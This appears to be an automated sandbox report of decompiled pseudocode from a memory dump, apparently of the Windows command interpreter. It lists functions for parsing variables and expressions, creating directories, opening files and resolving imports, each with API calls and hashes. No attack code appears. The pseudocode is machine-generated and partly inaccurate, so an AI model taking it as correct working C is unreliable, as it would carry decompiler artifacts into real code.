                                                      			E4A732CB4(signed int __eax, void* __ecx, void* __esi) {
                                                      				signed char _t48;
                                                      				signed int _t52;
                                                      				signed int _t53;
                                                      				signed int _t54;
                                                      				signed int _t57;
                                                      				int _t58;
                                                      				int _t60;
                                                      				int _t62;
                                                      				signed int _t70;
                                                      				int _t71;
                                                      				int _t72;
                                                      				signed int _t74;
                                                      				void* _t75;
                                                      				void* _t76;
                                                      				void* _t78;
                                                      				int _t84;
                                                      				void* _t86;
                                                      				signed int _t87;
                                                      				long _t88;
                                                      				int _t89;
                                                      				void* _t90;
                                                      				void* _t91;
                                                      				void* _t92;
                                                      				signed int _t93;
                                                      
                                                      				_t91 = __esi;
                                                      				_t48 = __eax & 0x00007300;
                                                      				 *((intOrPtr*)(_t48 - 0x2e7bf0f0)) =  *((intOrPtr*)(_t48 - 0x2e7bf0f0)) + __ecx;
                                                      				if((_t48 & 0x00000010) != 0) {
                                                      					_t74 =  *(_t93 - 0x214);
                                                      					 *((short*)(_t93 + _t74 * 2 - 0x20c)) = 0;
                                                      				}
                                                      				_t87 = E4A7340F2(0x2a, _t93 - 0x20c,  *(_t93 - 0x218));
                                                      				 *(_t93 - 0x214) = _t87;
                                                      				if(_t87 == 0xffffffff) {
                                                      					_t52 = E4A7340F2(0x2d, _t93 - 0x20c,  *(_t93 - 0x218));
                                                      					__eflags = _t52 - 0x2d;
                                                      					if(_t52 != 0x2d) {
                                                      						goto L5;
                                                      					}
                                                      					goto L10;
                                                      				} else {
                                                      					if(_t87 == 0x14) {
                                                      						 *((intOrPtr*)(_t91 + 0x40)) = 1;
                                                      					}
                                                      					L5:
                                                      					 *(_t93 - 0x20d) = 0;
                                                      					 *((char*)(_t93 - 0x20e)) = 0;
                                                      					if(_t87 == 0xffffffff) {
                                                      						_t74 = 0;
                                                      						__eflags = 0;
                                                      						 *((char*)(_t93 - 0x20f)) = 0;
                                                      						do {
                                                      							_t53 =  *(_t91 + 0x38);
                                                      							_t88 =  *(_t53 + _t74 * 2) & 0x0000ffff;
                                                      							__eflags = _t88;
                                                      							if(_t88 == 0) {
                                                      								L24:
                                                      								 *((char*)(_t93 - 0x20f)) = 1;
                                                      								goto L22;
                                                      							}
                                                      							__eflags = _t88 - 0x22;
                                                      							if(_t88 == 0x22) {
                                                      								__eflags =  *(_t93 - 0x20d);
                                                      								_t70 = _t53 & 0xffffff00 |  *(_t93 - 0x20d) == 0x00000000;
                                                      								__eflags = _t70;
                                                      								 *(_t93 - 0x20d) = _t70;
                                                      								 *((char*)(_t93 - 0x20e)) = _t70 == 0;
                                                      							}
                                                      							__eflags =  *(_t93 - 0x20d);
                                                      							if( *(_t93 - 0x20d) != 0) {
                                                      								L21:
                                                      								_t74 = _t74 + 1;
                                                      								__eflags = _t74;
                                                      								 *((char*)(_t93 - 0x20e)) = 0;
                                                      								goto L22;
                                                      							}
                                                      							__eflags =  *((char*)(_t93 - 0x20e));
                                                      							if( *((char*)(_t93 - 0x20e)) != 0) {
                                                      								goto L21;
                                                      							}
                                                      							_t71 = iswspace(_t88);
                                                      							__eflags = _t71;
                                                      							if(_t71 != 0) {
                                                      								goto L24;
                                                      							}
                                                      							_t72 = E4A7318EB("=,;", _t88);
                                                      							__eflags = _t72;
                                                      							if(_t72 != 0) {
                                                      								goto L24;
                                                      							}
                                                      							__eflags = _t88 -  *0x4a77065c; // 0x2f
                                                      							if(__eflags == 0) {
                                                      								goto L24;
                                                      							}
                                                      							goto L21;
                                                      							L22:
                                                      							__eflags =  *((char*)(_t93 - 0x20f));
                                                      						} while ( *((char*)(_t93 - 0x20f)) == 0);
                                                      					}
                                                      					_t54 =  *(_t91 + 0x38);
                                                      					_t86 = _t54 + 2;
                                                      					do {
                                                      						_t78 =  *_t54;
                                                      						_t54 = _t54 + 2;
                                                      					} while (_t78 != 0);
                                                      					_t57 = _t54 - _t86 >> 1;
                                                      					if(_t74 != _t57) {
                                                      						_t89 = _t57 + 1;
                                                      						_t58 =  *(_t91 + 0x3c);
                                                      						__eflags = _t58;
                                                      						if(_t58 == 0) {
                                                      							L32:
                                                      							_t60 = E4A732041(_t89 + _t89);
                                                      							_t75 = _t74 + _t74;
                                                      							 *(_t93 - 0x218) = _t60;
                                                      							E4A73185A(_t60, _t89,  *(_t91 + 0x38) + _t75);
                                                      							_t62 =  *(_t91 + 0x3c);
                                                      							__eflags = _t62;
                                                      							if(_t62 != 0) {
                                                      								E4A7320A9(_t91,  *(_t93 - 0x218), _t89, _t62);
                                                      							}
                                                      							 *(_t91 + 0x3c) =  *(_t93 - 0x218);
                                                      							 *((short*)(_t75 +  *(_t91 + 0x38))) = 0;
                                                      							goto L9;
                                                      						}
                                                      						_t37 = _t58 + 2; // 0x4a754212
                                                      						_t86 = _t37;
                                                      						do {
                                                      							_t84 =  *_t58;
                                                      							_t58 = _t58 + 2;
                                                      							__eflags = _t84;
                                                      						} while (_t84 != 0);
                                                      						__eflags = _t89;
                                                      						goto L32;
                                                      					}
                                                      					L9:
                                                      					_t52 =  *(_t93 - 0x214);
                                                      					L10:
                                                      					_pop(_t90);
                                                      					_pop(_t92);
                                                      					_pop(_t76);
                                                      					return E4A7313A9(_t52, _t76,  *(_t93 - 4) ^ _t93, _t86, _t90, _t92);
                                                      				}
                                                      			}




























                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true
                                                      • Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp
                                                      Similarity
                                                      • API ID: _wcsicmp
                                                      • String ID: CMDCMDLINE$CMDEXTVERSION$DATE$ERRORLEVEL$TIME
                                                      • API String ID: 2081463915-737311213
                                                      • Opcode ID: 2139fef83535d9e10eb555449cf3d89369083bac7002bfc0841daeff5c8c0ffe
                                                      • Instruction ID: dc8d7e4d6f200af8b4df836dd35fe03c02a463e6f5da7909a706bd4f37547927
                                                      • Opcode Fuzzy Hash: 2139fef83535d9e10eb555449cf3d89369083bac7002bfc0841daeff5c8c0ffe
                                                      • Instruction Fuzzy Hash: 8A11027210D7523DFB690730EC56A492FA9EF12264B22412AEA01DD4A2FF12D908D398
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 45%
                                                      			E4A73F83C(void* __ebx, void* __edx, void* __esi, WCHAR* _a4) {
                                                      				signed int _v8;
                                                      				char _v522;
                                                      				signed short _v524;
                                                      				short _v526;
                                                      				short _v528;
                                                      				WCHAR* _v532;
                                                      				void* __edi;
                                                      				signed int _t24;
                                                      				long _t28;
                                                      				long _t29;
                                                      				void* _t32;
                                                      				signed short* _t37;
                                                      				int _t39;
                                                      				signed short* _t40;
                                                      				signed short* _t41;
                                                      				int _t43;
                                                      				long _t45;
                                                      				void* _t47;
                                                      				void* _t50;
                                                      				void* _t60;
                                                      				WCHAR* _t61;
                                                      				void* _t62;
                                                      				void* _t64;
                                                      				signed int _t65;
                                                      
                                                      				_t62 = __esi;
                                                      				_t60 = __edx;
                                                      				_t50 = __ebx;
                                                      				_t24 =  *0x4a7540ac; // 0xbb40e64e
                                                      				_v8 = _t24 ^ _t65;
                                                      				_t61 = _a4;
                                                      				if(_t61[1] != 0x3a) {
                                                      					L2:
                                                      					_push(_t50);
                                                      					_push(_t62);
                                                      					_t28 = GetFullPathNameW(_t61, 0x104,  &_v528,  &_v532);
                                                      					if(_t28 == 0) {
                                                      						_push(0);
                                                      						_t29 = GetLastError();
                                                      						goto L29;
                                                      					} else {
                                                      						if(_t28 >= 0x104) {
                                                      							_push(_t61);
                                                      							_push(1);
                                                      							_push(0x400023d9);
                                                      							__eflags = _t28 + 1;
                                                      							goto L32;
                                                      						} else {
                                                      							if(CreateDirectoryW(_t61, 0) == 0) {
                                                      								_t29 = GetLastError();
                                                      								__eflags = _t29 - 0xb7;
                                                      								if(_t29 == 0xb7) {
                                                      									_push(_t61);
                                                      									_push(1);
                                                      									_push(0x235c);
                                                      									L32:
                                                      									E4A736D44(_t52);
                                                      									goto L49;
                                                      								} else {
                                                      									__eflags = _t29 - 3;
                                                      									if(_t29 != 3) {
                                                      										L34:
                                                      										_push(0);
                                                      										L29:
                                                      										_push(_t29);
                                                      										goto L48;
                                                      									} else {
                                                      										__eflags =  *0x4a754081; // 0x0
                                                      										if(__eflags == 0) {
                                                      											L16:
                                                      											_push(0);
                                                      											_push(0x52);
                                                      											L48:
                                                      											E4A736D44(_t52);
                                                      											L49:
                                                      											_t32 = 1;
                                                      											goto L6;
                                                      										} else {
                                                      											__eflags = _v526 - 0x3a;
                                                      											_t61 = 0x5c;
                                                      											_t64 = 2;
                                                      											if(_v526 != 0x3a) {
                                                      												__eflags = _v528 - _t61;
                                                      												if(_v528 != _t61) {
                                                      													goto L16;
                                                      												} else {
                                                      													__eflags = _v526 - _t61;
                                                      													if(_v526 != _t61) {
                                                      														goto L16;
                                                      													} else {
                                                      														_t37 =  &_v524;
                                                      														_v532 = _t37;
                                                      														__eflags = _v524;
                                                      														if(_v524 == 0) {
                                                      															goto L21;
                                                      														} else {
                                                      															_t52 = _v524 & 0x0000ffff;
                                                      															while(1) {
                                                      																__eflags = _t52 - _t61;
                                                      																if(_t52 == _t61) {
                                                      																	break;
                                                      																}
                                                      																_t37 = _t37 + _t64;
                                                      																_v532 = _t37;
                                                      																_t52 =  *_t37 & 0x0000ffff;
                                                      																__eflags = _t52;
                                                      																if(_t52 != 0) {
                                                      																	continue;
                                                      																}
                                                      																break;
                                                      															}
                                                      															__eflags =  *_t37;
                                                      															if( *_t37 == 0) {
                                                      																goto L21;
                                                      															} else {
                                                      																_t40 = _t37 + _t64;
                                                      																_v532 = _t40;
                                                      																_t52 =  *_t40 & 0x0000ffff;
                                                      																__eflags = _t52;
                                                      																if(_t52 == 0) {
                                                      																	goto L21;
                                                      																} else {
                                                      																	while(1) {
                                                      																		__eflags = _t52 - _t61;
                                                      																		if(_t52 == _t61) {
                                                      																			break;
                                                      																		}
                                                      																		_t40 = _t40 + _t64;
                                                      																		_v532 = _t40;
                                                      																		_t52 =  *_t40 & 0x0000ffff;
                                                      																		__eflags = _t52;
                                                      																		if(_t52 != 0) {
                                                      																			continue;
                                                      																		}
                                                      																		break;
                                                      																	}
                                                      																	__eflags =  *_t40;
                                                      																	if( *_t40 != 0) {
                                                      																		goto L26;
                                                      																	} else {
                                                      																		goto L21;
                                                      																	}
                                                      																}
                                                      															}
                                                      														}
                                                      													}
                                                      												}
                                                      											} else {
                                                      												_t41 =  &_v522;
                                                      												L13:
                                                      												_v532 = _t41;
                                                      												while(1) {
                                                      													L20:
                                                      													_t52 =  *_t41 & 0x0000ffff;
                                                      													__eflags = _t52;
                                                      													if(_t52 != 0) {
                                                      														goto L17;
                                                      													} else {
                                                      														break;
                                                      													}
                                                      													while(1) {
                                                      														L17:
                                                      														__eflags = _t52 - _t61;
                                                      														if(_t52 == _t61) {
                                                      															break;
                                                      														}
                                                      														_t41 = _t41 + _t64;
                                                      														_v532 = _t41;
                                                      														_t52 =  *_t41 & 0x0000ffff;
                                                      														__eflags = _t52;
                                                      														if(_t52 != 0) {
                                                      															continue;
                                                      														} else {
                                                      															__eflags =  *_t41 - _t61;
                                                      															if( *_t41 == _t61) {
                                                      																break;
                                                      															} else {
                                                      																goto L20;
                                                      															}
                                                      														}
                                                      														goto L50;
                                                      													}
                                                      													_t52 = 0;
                                                      													 *_t41 = 0;
                                                      													_t43 = CreateDirectoryW( &_v528, 0);
                                                      													__eflags = _t43;
                                                      													if(_t43 != 0) {
                                                      														L25:
                                                      														 *_v532 = _t61;
                                                      														_t40 = _v532;
                                                      														L26:
                                                      														_t41 = _t40 + _t64;
                                                      														goto L13;
                                                      													} else {
                                                      														_t45 = GetLastError();
                                                      														__eflags = _t45 - 0xb7;
                                                      														if(_t45 != 0xb7) {
                                                      															goto L16;
                                                      														} else {
                                                      															goto L25;
                                                      														}
                                                      													}
                                                      													goto L50;
                                                      												}
                                                      												L21:
                                                      												_t39 = CreateDirectoryW( &_v528, 0);
                                                      												__eflags = _t39;
                                                      												if(_t39 != 0) {
                                                      													goto L5;
                                                      												} else {
                                                      													_t29 = GetLastError();
                                                      													__eflags = _t29 - 0xb7;
                                                      													if(_t29 == 0xb7) {
                                                      														goto L5;
                                                      													} else {
                                                      														goto L34;
                                                      													}
                                                      												}
                                                      											}
                                                      										}
                                                      									}
                                                      								}
                                                      								L50:
                                                      							} else {
                                                      								L5:
                                                      								_t32 = 0;
                                                      							}
                                                      						}
                                                      					}
                                                      					L6:
                                                      					_pop(_t62);
                                                      					_pop(_t50);
                                                      				} else {
                                                      					_t47 = E4A732B68( *_t61 & 0x0000ffff);
                                                      					if(_t47 == 0) {
                                                      						_push(_t47);
                                                      						_push(0xf);
                                                      						E4A736D44(_t52);
                                                      						_t32 = 1;
                                                      					} else {
                                                      						goto L2;
                                                      					}
                                                      				}
                                                      				return E4A7313A9(_t32, _t50, _v8 ^ _t65, _t60, _t61, _t62);
                                                      				goto L50;
                                                      			}

                                                      APIs
                                                      • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 4A73F884
                                                      • CreateDirectoryW.KERNEL32(?,00000000), ref: 4A73F89E
                                                        • Part of subcall function 4A732B68: GetDriveTypeW.KERNEL32(?,?,?,?,4A731571,?,?,4A73745B,-00000003,00000000,00000000,00000000,00000000,?,00000004,?), ref: 4A732B9D
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true
                                                      • Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp
                                                      Similarity
                                                      • API ID: CreateDirectoryDriveFullNamePathType
                                                      • String ID: :
                                                      • API String ID: 3208614439-336475711
                                                      • Opcode ID: 69927e1e5ded5f3d203d81d2e76d0f46281213ba44659b907d00fa7221f6e7f3
                                                      • Instruction ID: eb37ba0606ddcc7b97fa2f32cfc98aecf7e84c193578538a689722ba6418a568
                                                      • Opcode Fuzzy Hash: 69927e1e5ded5f3d203d81d2e76d0f46281213ba44659b907d00fa7221f6e7f3
                                                      • Instruction Fuzzy Hash: A6514DB2A1D21DDADBB09B54CC887EA7FBCEB05750F424496E215DB041E7B48EC8C7A1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 22%
                                                      			E4A73F05C(intOrPtr _a4, wchar_t* _a8, long _a12, intOrPtr _a16) {
                                                      				char _v8;
                                                      				char _v12;
                                                      				char _v24;
                                                      				wchar_t* _t56;
                                                      				long _t57;
                                                      				long _t65;
                                                      				signed int _t70;
                                                      				intOrPtr* _t87;
                                                      
                                                      				_t65 = E4A73F123( &_a8) & 0x0000ffff;
                                                      				if(_t65 == 0) {
                                                      					L23:
                                                      					_a16 = 0x400023cd;
                                                      					L9:
                                                      					L10:
                                                      					asm("movsd");
                                                      					asm("movsd");
                                                      					asm("movsd");
                                                      					return _a4;
                                                      				}
                                                      				if(_t65 == 0x28) {
                                                      					_a8 =  &(_a8[0]);
                                                      					asm("movsd");
                                                      					asm("movsd");
                                                      					_push( &_v24);
                                                      					asm("movsd");
                                                      					E4A73ECB3();
                                                      					asm("movsd");
                                                      					asm("movsd");
                                                      					asm("movsd");
                                                      					if(_a16 != 0) {
                                                      						L21:
                                                      						goto L10;
                                                      					}
                                                      					if(E4A73F123( &_a8) != 0x29) {
                                                      						_a16 = 0x400023cc;
                                                      					} else {
                                                      						_a8 =  &(_a8[0]);
                                                      					}
                                                      					goto L9;
                                                      				}
                                                      				if(wcschr(L"+-~!", _t65) != 0) {
                                                      					_a8 =  &(_a8[0]);
                                                      					asm("movsd");
                                                      					asm("movsd");
                                                      					_push( &_v24);
                                                      					asm("movsd");
                                                      					E4A73F05C();
                                                      					asm("movsd");
                                                      					asm("movsd");
                                                      					asm("movsd");
                                                      					if(_a16 != 0) {
                                                      						goto L21;
                                                      					}
                                                      					E4A73FAF0( &_a8, _t65, _a12);
                                                      					goto L9;
                                                      				}
                                                      				if(iswdigit(_t65) == 0) {
                                                      					if(E4A73F176( &_a8,  &_v12,  &_v8) == 0) {
                                                      						goto L23;
                                                      					} else {
                                                      						_a12 = E4A73EB3C(_v12, _v8);
                                                      						goto L9;
                                                      					}
                                                      				}
                                                      				_t87 = __imp___errno;
                                                      				 *((intOrPtr*)( *_t87())) = 0;
                                                      				_t56 = _a8;
                                                      				if( *_t56 == 0x30) {
                                                      					_t70 = _t56[0] & 0x0000ffff;
                                                      					if(_t70 == 0x78) {
                                                      						L25:
                                                      						_t57 = wcstoul(_t56,  &_a8, 0);
                                                      						L6:
                                                      						_a12 = _t57;
                                                      						if(_t57 == 0x7fffffff) {
                                                      							if( *((intOrPtr*)( *_t87())) != 0x22) {
                                                      								goto L7;
                                                      							}
                                                      							_a16 = 0x400023d0;
                                                      							goto L9;
                                                      						}
                                                      						L7:
                                                      						if(iswdigit( *_a8 & 0x0000ffff) != 0 || iswalpha( *_a8 & 0x0000ffff) != 0) {
                                                      							_a16 = 0x400023cf;
                                                      						}
                                                      						goto L9;
                                                      					}
                                                      					if(_t70 != 0x58) {
                                                      						goto L5;
                                                      					}
                                                      					goto L25;
                                                      				}
                                                      				L5:
                                                      				_t57 = wcstol(_t56,  &_a8, 0);
                                                      				goto L6;
                                                      			}












                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true
                                                      • Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp
                                                      Similarity
                                                      • API ID: _errnoiswdigit$iswalphawcschrwcstolwcstoul
                                                      • String ID: +-~!
                                                      • API String ID: 2191331888-2604099254
                                                      • Opcode ID: aeec3a97fc7c511b89fdc4e42b6693cbd4e8bf2a44ff97924b650c245ac8cc8a
                                                      • Instruction ID: 5c52606acf69c03335bbb1a31d6e8dd6aa0b3588c5f7e5b2649bd76821773e06
                                                      • Opcode Fuzzy Hash: aeec3a97fc7c511b89fdc4e42b6693cbd4e8bf2a44ff97924b650c245ac8cc8a
                                                      • Instruction Fuzzy Hash: 70414EB680990AABDB60DF54D94499B3BA9EF462A1F128022FD15DF081D774DF0CCBA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 29%
                                                      			E4A741F83(WCHAR* _a4, long _a8, long _a12) {
                                                      				long _v8;
                                                      				void* _v12;
                                                      				struct _SECURITY_ATTRIBUTES _v24;
                                                      				signed int _t35;
                                                      				WCHAR* _t37;
                                                      				void* _t38;
                                                      				void* _t40;
                                                      				long _t41;
                                                      				signed char _t46;
                                                      				void* _t48;
                                                      				signed int _t55;
                                                      				signed int _t56;
                                                      				signed int _t57;
                                                      				long _t59;
                                                      				void* _t61;
                                                      
                                                      				_t46 = _a8;
                                                      				_v24.lpSecurityDescriptor = _v24.lpSecurityDescriptor & 0x00000000;
                                                      				_t55 = 3;
                                                      				_t35 = _t46 & _t55;
                                                      				_t59 = 2;
                                                      				_v24.bInheritHandle = 1;
                                                      				_v24.nLength = 0xc;
                                                      				if(_t35 > _t59) {
                                                      					L8:
                                                      					_t57 = _t56 | 0xffffffff;
                                                      					L7:
                                                      					return _t57;
                                                      				}
                                                      				if((1 & _t46) != 0) {
                                                      					if((_t46 & 0x00000008) == 0) {
                                                      						goto L2;
                                                      					}
                                                      					goto L8;
                                                      				}
                                                      				L2:
                                                      				if(_t35 != 0) {
                                                      					_a8 = 0x40000000;
                                                      					if((_t46 & 0x00000002) != 0) {
                                                      						_a8 = 0xc0000000;
                                                      					}
                                                      					__imp___wcsicmp(_a4, "con");
                                                      					_pop(_t48);
                                                      					if(_t35 != 0) {
                                                      						_a12 = 1;
                                                      					}
                                                      					_v8 = _t59;
                                                      				} else {
                                                      					_a8 = 0x80000000;
                                                      					_v8 = _t55;
                                                      					__imp___wcsicmp(_a4, "con");
                                                      					_pop(_t48);
                                                      					if(_t35 == 0) {
                                                      						_a12 = 1;
                                                      					}
                                                      				}
                                                      				_t37 = E4A732598(_t48, _a4);
                                                      				_a4 = _t37;
                                                      				if(_v8 == _t59) {
                                                      					_t38 = CreateFileW(_t37, _a8, _a12,  &_v24, 3, 0x8000080, 0);
                                                      					_v12 = _t38;
                                                      					if(_t38 == 0xffffffffffffffff) {
                                                      						goto L5;
                                                      					}
                                                      					__imp___open_osfhandle(_t38, 8);
                                                      					_t57 = _t38;
                                                      					if(_t57 != 0xffffffffffffffff) {
                                                      						goto L7;
                                                      					}
                                                      					_push(_v12);
                                                      					goto L20;
                                                      				} else {
                                                      					L5:
                                                      					_t40 = CreateFileW(_a4, _a8, _a12,  &_v24, _v8, 0x8000080, 0);
                                                      					_t61 = _t40;
                                                      					if(_t61 == 0xffffffffffffffff) {
                                                      						_t41 = GetLastError();
                                                      						 *0x4a754128 = _t41;
                                                      						if(_t41 == 0x6e) {
                                                      							 *0x4a754128 = 2;
                                                      						}
                                                      						_t57 = 0xffffffffffffffff;
                                                      						goto L7;
                                                      					}
                                                      					__imp___open_osfhandle(_t61, 8);
                                                      					_t57 = _t40;
                                                      					if(_t57 == 0xffffffffffffffff) {
                                                      						_push(_t61);
                                                      						L20:
                                                      						CloseHandle();
                                                      					}
                                                      					goto L7;
                                                      				}
                                                      			}



















                                                      APIs
                                                      • _wcsicmp.MSVCRT ref: 4A741FD6
                                                      • CreateFileW.KERNEL32(00000000,80000000,00000000,08000080,0000233F,08000080,00000000), ref: 4A74201B
                                                      • _open_osfhandle.MSVCRT ref: 4A74202A
                                                      • _wcsicmp.MSVCRT ref: 4A749C47
                                                      • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,08000080,00000000), ref: 4A749C76
                                                      • _open_osfhandle.MSVCRT ref: 4A749C86
                                                      • CloseHandle.KERNEL32(00000000), ref: 4A749C9B
                                                      • GetLastError.KERNEL32 ref: 4A749CA6
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true
                                                      • Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp
                                                      Similarity
                                                      • API ID: CreateFile_open_osfhandle_wcsicmp$CloseErrorHandleLast
                                                      • String ID: con
                                                      • API String ID: 2772705192-4257191772
                                                      • Opcode ID: f547028b40facbd14dd194236c6b1d147dfc8d6664a0f681bd5962b2f06165d8
                                                      • Instruction ID: 4c78b5c8e2f508af1e5431c75cc7390989a6537d841c203c22937a567c5b9df8
                                                      • Opcode Fuzzy Hash: f547028b40facbd14dd194236c6b1d147dfc8d6664a0f681bd5962b2f06165d8
                                                      • Instruction Fuzzy Hash: 7A41C57294D205FFEB309FA5C945B9E3FB9EB45361F128029F610DA191DB718A14CB50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 83%
                                                      			E4A73BD84(struct HINSTANCE__* _a4, long* _a8) {
                                                      				signed int _v8;
                                                      				CHAR* _v12;
                                                      				struct HINSTANCE__* _v24;
                                                      				CHAR* _v36;
                                                      				void _v44;
                                                      				char _v48;
                                                      				struct HINSTANCE__* _t34;
                                                      				signed int _t37;
                                                      				long _t39;
                                                      				int _t42;
                                                      				CHAR* _t46;
                                                      				signed short _t48;
                                                      				signed int _t49;
                                                      				void* _t52;
                                                      				struct HINSTANCE__* _t57;
                                                      				LONG* _t61;
                                                      				long _t62;
                                                      				int _t63;
                                                      
                                                      				_t34 = _a4;
                                                      				_v8 = _v8 & 0x00000000;
                                                      				_t61 =  *((intOrPtr*)(_t34 + 8)) + 0x4a730000;
                                                      				_t52 =  *_t61;
                                                      				_t46 =  *((intOrPtr*)(_t34 + 4)) + 0x4a730000;
                                                      				_t48 =  *( *((intOrPtr*)(_t34 + 0x10)) + 0x4a730000 + (_a8 -  *((intOrPtr*)(_t34 + 0xc)) - 0x4a730000 >> 2) * 4);
                                                      				_a4 = _t52;
                                                      				_t13 = _t48 + 0x4a730002; // 0x94e60002
                                                      				_t37 = _t13;
                                                      				if(_t48 < 0) {
                                                      					_t37 = _t48 & 0x0000ffff;
                                                      				}
                                                      				_v12 = _t37;
                                                      				if(_t52 == 0) {
                                                      					_t57 = LoadLibraryExA(_t46, _t52, _t52);
                                                      					_a4 = _t57;
                                                      					if(_t57 == 0) {
                                                      						_t39 = GetLastError();
                                                      						if(_t39 == 0x7e || _t39 == 0xc1) {
                                                      							_t39 = InterlockedCompareExchange(_t61, 0xffffffff, 0);
                                                      							if(_t39 == 0) {
                                                      								goto L23;
                                                      							} else {
                                                      								_a4 = _t39;
                                                      								goto L2;
                                                      							}
                                                      						} else {
                                                      							goto L26;
                                                      						}
                                                      					} else {
                                                      						_t42 = InterlockedCompareExchange(_t61, _t57, 0);
                                                      						_t63 = _t42;
                                                      						if(_t63 != 0) {
                                                      							_t39 = FreeLibrary(_t57);
                                                      							_a4 = _t63;
                                                      						} else {
                                                      							_t49 = 8;
                                                      							memset( &_v44, _t42, _t49 << 2);
                                                      							_v24 = _a4;
                                                      							_t39 =  *0x4a73be9c; // 0x0
                                                      							_v48 = 0x24;
                                                      							_v36 = _t46;
                                                      							if(_t39 != 0) {
                                                      								_t39 =  *_t39(5,  &_v48);
                                                      							}
                                                      						}
                                                      						goto L2;
                                                      					}
                                                      				} else {
                                                      					L2:
                                                      					if(_a4 == 0xffffffff) {
                                                      						L23:
                                                      						_v8 = 1;
                                                      						goto L26;
                                                      					} else {
                                                      						if(_a4 == 0) {
                                                      							L26:
                                                      							_push(_v12);
                                                      							_push(_t46);
                                                      							L4A75241B();
                                                      							_t62 = _t39;
                                                      						} else {
                                                      							_t39 = GetProcAddress(_a4, _v12);
                                                      							_t62 = _t39;
                                                      							if(_t62 == 0) {
                                                      								_t39 = GetLastError();
                                                      								if(_t39 != 0x7f) {
                                                      									if(_t39 != 0xb6) {
                                                      										goto L6;
                                                      									} else {
                                                      										goto L5;
                                                      									}
                                                      								} else {
                                                      									goto L5;
                                                      								}
                                                      								L27:
                                                      							} else {
                                                      								L5:
                                                      								_v8 = 1;
                                                      							}
                                                      							L6:
                                                      							if(_t62 == 0) {
                                                      								goto L26;
                                                      							}
                                                      						}
                                                      					}
                                                      				}
                                                      				if(_v8 != 0) {
                                                      					 *_a8 = _t62;
                                                      				}
                                                      				return _t62;
                                                      				goto L27;
                                                      			}

                                                      APIs
                                                      • GetProcAddress.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 4A73BDF0
                                                      • LoadLibraryExA.KERNEL32(00000000), ref: 4A73BE3B
                                                      • InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 4A73BE51
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true
                                                      • Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp
                                                      Similarity
                                                      • API ID: AddressCompareExchangeInterlockedLibraryLoadProc
                                                      • String ID: $
                                                      • API String ID: 792202920-3993045852
                                                      • Opcode ID: 647ef3cc8b454931111d25df1b560ebbca03977cab30bf4c3fc5679143a7eeee
                                                      • Instruction ID: d10d513fdd1478567f6895de52e86415f7533e80d95bc3265b8a76ee6989a24c
                                                      • Opcode Fuzzy Hash: 647ef3cc8b454931111d25df1b560ebbca03977cab30bf4c3fc5679143a7eeee
                                                      • Instruction Fuzzy Hash: 7541C37290C609ABDB308F58C880BDD7FB4AFE4760F13811AE915AF245D770DA49CB91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 81%
                                                      			E4A74301F(void* __edx, intOrPtr _a4, long _a8, char _a16) {
                                                      				signed int _v8;
                                                      				char _v40;
                                                      				short _v104;
                                                      				short _v108;
                                                      				char* _v112;
                                                      				char* _v116;
                                                      				char* _v120;
                                                      				void* __ebx;
                                                      				void* __edi;
                                                      				void* __esi;
                                                      				signed int _t25;
                                                      				long _t30;
                                                      				signed int _t35;
                                                      				void* _t46;
                                                      				intOrPtr _t50;
                                                      				void* _t53;
                                                      				void* _t55;
                                                      				signed int _t56;
                                                      
                                                      				_t53 = __edx;
                                                      				_t25 =  *0x4a7540ac; // 0xbb40e64e
                                                      				_v8 = _t25 ^ _t56;
                                                      				_t50 = _a4;
                                                      				_t55 = FormatMessageW;
                                                      				_v112 =  &_a16;
                                                      				_v108 = 0;
                                                      				_t30 = FormatMessageW(0x1900, 0, _a8, 0,  &_v108, 0xa,  &_v112);
                                                      				_v112 = 0;
                                                      				if(_t30 == 0) {
                                                      					__imp___ultoa(_a8,  &_v40, 0x10);
                                                      					_t35 = E4A734B8D(GetACP());
                                                      					asm("sbb eax, eax");
                                                      					MultiByteToWideChar(0,  ~( ~_t35),  &_v40, 0xffffffff,  &_v104, 0x20);
                                                      					_v120 =  &_v104;
                                                      					_v116 = L"Application";
                                                      					if(_a8 < 0x2328) {
                                                      						_v116 = L"System";
                                                      					}
                                                      					if(FormatMessageW(0x3100, 0, 0x13d, 0,  &_v108, 0xa,  &_v120) != 0) {
                                                      						goto L1;
                                                      					}
                                                      					_t46 = 1;
                                                      					L4:
                                                      					return E4A7313A9(_t46, _t50, _v8 ^ _t56, _t53, 0, _t55);
                                                      				}
                                                      				L1:
                                                      				E4A73AAF4(_t50, _v108);
                                                      				if(E4A73A8A9(_t50,  *((intOrPtr*)(_t50 + 0x10))) != 0) {
                                                      					E4A73B0F9(_t50, _t53, 0, _t50);
                                                      				}
                                                      				LocalFree(_v108);
                                                      				_t46 = 0;
                                                      				goto L4;
                                                      			}

                                                      APIs
                                                      • FormatMessageW.KERNEL32(00001900,00000000,00000000,00000000,?,0000000A,?,?,?,?), ref: 4A74305C
